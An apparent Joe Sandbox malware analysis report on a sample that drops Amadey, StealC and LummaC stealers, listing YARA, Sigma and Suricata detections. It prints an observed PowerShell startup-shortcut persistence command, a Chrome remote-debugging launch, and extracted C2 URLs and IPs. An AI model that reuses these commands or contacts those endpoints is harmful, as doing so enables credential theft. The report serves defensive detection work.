Process Memory Space: deb333ea90.exe PID: 5940	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: deb333ea90.exe PID: 5940	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: 06d4af6f50.exe PID: 8040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: 06d4af6f50.exe PID: 8040	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 37 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
20.2.skotes.exe.780000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
19.2.DocumentsKECBGCGCGI.exe.620000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\06d4af6f50.exe

Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE

Source: File created

Author: Christopher Peacock '@securepeacock', SCYTHE: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", CommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe, ParentProcessId: 6816, ParentProcessName: mk.exe, ProcessCommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", ProcessId: 5384, ProcessName: powershell.exe

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 2232, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default", ProcessId: 2140, ProcessName: chrome.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 2848, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\06d4af6f50.exe

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5384, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", CommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe, ParentProcessId: 6816, ParentProcessName: mk.exe, ProcessCommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", ProcessId: 5384, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Powershell create lnk in startup

Source: Process started

Author: Joe Security: Data: Command: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", CommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1006034001\mk.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1006034001\mk.exe, ParentProcessId: 6816, ParentProcessName: mk.exe, ProcessCommandLine: powershell -Command "$ws = New-Object -ComObject WScript.Shell; $s = $ws.CreateShortcut('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\prua.lnk'); $s.TargetPath = 'C:\Users\user\AppData\Local\Temp\1006034001\mk.exe'; $s.Save()", ProcessId: 5384, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:35.070414+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49805	TCP
2024-11-13T20:40:13.406489+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	50103	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:22.021072+0100	2028371	3	Unknown Traffic	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:23.583286+0100	2028371	3	Unknown Traffic	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:25.727666+0100	2028371	3	Unknown Traffic	192.168.2.5	50148	172.67.174.133	443	TCP
2024-11-13T20:41:27.684789+0100	2028371	3	Unknown Traffic	192.168.2.5	50151	172.67.174.133	443	TCP
2024-11-13T20:41:29.950892+0100	2028371	3	Unknown Traffic	192.168.2.5	50155	172.67.174.133	443	TCP
2024-11-13T20:41:32.676325+0100	2028371	3	Unknown Traffic	192.168.2.5	50158	172.67.174.133	443	TCP
2024-11-13T20:41:34.137574+0100	2028371	3	Unknown Traffic	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:35.223628+0100	2028371	3	Unknown Traffic	192.168.2.5	50163	172.67.174.133	443	TCP
2024-11-13T20:41:35.824470+0100	2028371	3	Unknown Traffic	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:37.932729+0100	2028371	3	Unknown Traffic	192.168.2.5	50165	172.67.174.133	443	TCP
2024-11-13T20:41:39.673704+0100	2028371	3	Unknown Traffic	192.168.2.5	50166	172.67.174.133	443	TCP
2024-11-13T20:41:41.522123+0100	2028371	3	Unknown Traffic	192.168.2.5	50167	172.67.174.133	443	TCP
2024-11-13T20:41:42.288481+0100	2028371	3	Unknown Traffic	192.168.2.5	50169	172.67.174.133	443	TCP
2024-11-13T20:41:44.892918+0100	2028371	3	Unknown Traffic	192.168.2.5	50172	172.67.174.133	443	TCP
2024-11-13T20:41:47.108028+0100	2028371	3	Unknown Traffic	192.168.2.5	50174	172.67.174.133	443	TCP
2024-11-13T20:41:50.169982+0100	2028371	3	Unknown Traffic	192.168.2.5	50180	172.67.174.133	443	TCP
2024-11-13T20:41:51.499261+0100	2028371	3	Unknown Traffic	192.168.2.5	50183	172.67.174.133	443	TCP
2024-11-13T20:41:53.934986+0100	2028371	3	Unknown Traffic	192.168.2.5	50185	172.67.174.133	443	TCP
2024-11-13T20:41:56.607446+0100	2028371	3	Unknown Traffic	192.168.2.5	50193	172.67.174.133	443	TCP
2024-11-13T20:41:58.617359+0100	2028371	3	Unknown Traffic	192.168.2.5	50198	172.67.174.133	443	TCP
2024-11-13T20:42:01.286280+0100	2028371	3	Unknown Traffic	192.168.2.5	50202	172.67.174.133	443	TCP
2024-11-13T20:42:03.359336+0100	2028371	3	Unknown Traffic	192.168.2.5	50204	172.67.174.133	443	TCP
2024-11-13T20:42:06.191339+0100	2028371	3	Unknown Traffic	192.168.2.5	50212	172.67.174.133	443	TCP
2024-11-13T20:42:09.236029+0100	2028371	3	Unknown Traffic	192.168.2.5	50215	172.67.174.133	443	TCP
2024-11-13T20:44:28.066169+0100	2028371	3	Unknown Traffic	192.168.2.5	50352	20.189.173.17	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:22.606853+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:24.523175+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:34.953432+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:36.435641+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:42.762124+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50169	172.67.174.133	443	TCP
2024-11-13T20:41:50.558147+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50180	172.67.174.133	443	TCP
2024-11-13T20:41:52.874549+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50183	172.67.174.133	443	TCP
2024-11-13T20:41:54.553598+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50185	172.67.174.133	443	TCP
2024-11-13T20:42:09.907927+0100	2054653	1	A Network Trojan was detected	192.168.2.5	50215	172.67.174.133	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:22.606853+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:34.953432+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:52.874549+0100	2049836	1	A Network Trojan was detected	192.168.2.5	50183	172.67.174.133	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:24.523175+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:36.435641+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:54.553598+0100	2049812	1	A Network Trojan was detected	192.168.2.5	50185	172.67.174.133	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (frogmen-smell .sbs in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:22.021072+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50143	172.67.174.133	443	TCP
2024-11-13T20:41:23.583286+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50146	172.67.174.133	443	TCP
2024-11-13T20:41:25.727666+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50148	172.67.174.133	443	TCP
2024-11-13T20:41:27.684789+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50151	172.67.174.133	443	TCP
2024-11-13T20:41:29.950892+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50155	172.67.174.133	443	TCP
2024-11-13T20:41:32.676325+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50158	172.67.174.133	443	TCP
2024-11-13T20:41:34.137574+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50162	172.67.174.133	443	TCP
2024-11-13T20:41:35.223628+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50163	172.67.174.133	443	TCP
2024-11-13T20:41:35.824470+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50164	172.67.174.133	443	TCP
2024-11-13T20:41:37.932729+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50165	172.67.174.133	443	TCP
2024-11-13T20:41:39.673704+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50166	172.67.174.133	443	TCP
2024-11-13T20:41:41.522123+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50167	172.67.174.133	443	TCP
2024-11-13T20:41:42.288481+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50169	172.67.174.133	443	TCP
2024-11-13T20:41:44.892918+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50172	172.67.174.133	443	TCP
2024-11-13T20:41:47.108028+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50174	172.67.174.133	443	TCP
2024-11-13T20:41:50.169982+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50180	172.67.174.133	443	TCP
2024-11-13T20:41:51.499261+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50183	172.67.174.133	443	TCP
2024-11-13T20:41:53.934986+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50185	172.67.174.133	443	TCP
2024-11-13T20:41:56.607446+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50193	172.67.174.133	443	TCP
2024-11-13T20:41:58.617359+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50198	172.67.174.133	443	TCP
2024-11-13T20:42:01.286280+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50202	172.67.174.133	443	TCP
2024-11-13T20:42:03.359336+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50204	172.67.174.133	443	TCP
2024-11-13T20:42:06.191339+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50212	172.67.174.133	443	TCP
2024-11-13T20:42:09.236029+0100	2057397	1	Domain Observed Used for C2 Detected	192.168.2.5	50215	172.67.174.133	443	TCP

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:08.869241+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50140	87.120.125.254	80	TCP
2024-11-13T20:41:43.676345+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50170	185.215.113.16	80	TCP
2024-11-13T20:41:52.872166+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50182	185.215.113.16	80	TCP
2024-11-13T20:42:10.573970+0100	2019714	2	Potentially Bad Traffic	192.168.2.5	50216	185.215.113.16	80	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:16.819643+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50141	185.215.113.43	80	TCP
2024-11-13T20:41:22.666364+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50144	185.215.113.43	80	TCP
2024-11-13T20:41:27.883359+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50150	185.215.113.43	80	TCP
2024-11-13T20:41:31.938368+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50156	185.215.113.43	80	TCP
2024-11-13T20:41:42.423356+0100	2044696	1	A Network Trojan was detected	192.168.2.5	50168	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frogmen-smell .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:21.317879+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.5	55701	1.1.1.1	53	UDP
2024-11-13T20:42:13.971033+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.5	59836	1.1.1.1	53	UDP
2024-11-13T20:42:30.937708+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.5	55305	1.1.1.1	53	UDP
2024-11-13T20:42:50.091266+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.5	57470	1.1.1.1	53	UDP
2024-11-13T20:43:12.981987+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.5	50572	1.1.1.1	53	UDP
2024-11-13T20:43:43.617849+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.5	53800	1.1.1.1	53	UDP
2024-11-13T20:44:22.309561+0100	2057396	1	Domain Observed Used for C2 Detected	192.168.2.5	55787	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:20.218541+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49720	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:20.212619+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.5	49720	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:20.502672+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.5	49720	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:21.617729+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.5	49720	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:20.509435+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.5	49720	TCP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:26.602679+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50148	172.67.174.133	443	TCP
2024-11-13T20:41:57.477359+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	50193	172.67.174.133	443	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:19.921295+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	49720	185.215.113.206	80	TCP
2024-11-13T20:41:28.015156+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50149	185.215.113.206	80	TCP
2024-11-13T20:41:45.183995+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50171	185.215.113.206	80	TCP
2024-11-13T20:42:18.517150+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.5	50222	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:05.569252+0100	2856147	1	A Network Trojan was detected	192.168.2.5	50138	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:15.902620+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.5	50139	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:08.869241+0100	2803305	3	Unknown Traffic	192.168.2.5	50140	87.120.125.254	80	TCP
2024-11-13T20:41:17.729253+0100	2803305	3	Unknown Traffic	192.168.2.5	50142	185.215.113.16	80	TCP
2024-11-13T20:41:23.615353+0100	2803305	3	Unknown Traffic	192.168.2.5	50145	185.215.113.16	80	TCP
2024-11-13T20:41:32.878334+0100	2803305	3	Unknown Traffic	192.168.2.5	50157	185.215.113.16	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:39:22.211828+0100	2803304	3	Unknown Traffic	192.168.2.5	49720	185.215.113.206	80	TCP
2024-11-13T20:39:45.498797+0100	2803304	3	Unknown Traffic	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:48.844225+0100	2803304	3	Unknown Traffic	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:50.897626+0100	2803304	3	Unknown Traffic	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:51.952710+0100	2803304	3	Unknown Traffic	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:54.187242+0100	2803304	3	Unknown Traffic	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:54.835551+0100	2803304	3	Unknown Traffic	192.168.2.5	49873	185.215.113.206	80	TCP
2024-11-13T20:39:58.839057+0100	2803304	3	Unknown Traffic	192.168.2.5	50022	185.215.113.16	80	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-13T20:41:35.230259+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50163	172.67.174.133	443	TCP
2024-11-13T20:41:47.112290+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50174	172.67.174.133	443	TCP
2024-11-13T20:42:06.202088+0100	2843864	1	A Network Trojan was detected	192.168.2.5	50212	172.67.174.133	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://frogmen-smell.sbs/SW	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs:443/apiE	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dll3k	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/lo	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/EU	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/mG	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs:443/apitPK	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/0	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs:443/apiMicrosoft	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/2	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/LMEM00	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dlla	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/freebl3.dll=j	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpY	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/_	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/a	Avira URL Cloud: Label: malware
Source: http://185.215.113.16/mine/random.exeS	Avira URL Cloud: Label: phishing
Source: http://185.215.113.43/Zu7JuNko/index.php)N	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/k	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/or	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpQ	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpB;	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/apiO	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/apiJ	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.phpncodedj	Avira URL Cloud: Label: phishing
Source: http://185.215.113.206/68b591d6548ec281/softokn3.dllp	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php;	Avira URL Cloud: Label: phishing
Source: https://frogmen-smell.sbs/apiW1	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/G	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/D	Avira URL Cloud: Label: malware
Source: https://frogmen-smell.sbs/apia	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000013.00000002.2763202923.0000000000621000.00000040.00000001.01000000.0000000B.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: deb333ea90.exe.2140.27.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.215.113.206/c4becf79229cb002.php", "Botnet": "mars"}
Source: 06d4af6f50.exe.8040.33.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": "https://frogmen-smell.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\random[1].exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1006039001\06d4af6f50.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1006040001\deb333ea90.exe	ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1006042001\ea44ea94c2.exe	ReversingLabs: Detection: 36%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7BA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C7BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C7B4440 PK11_PrivDecrypt,	0_2_6C7B4440
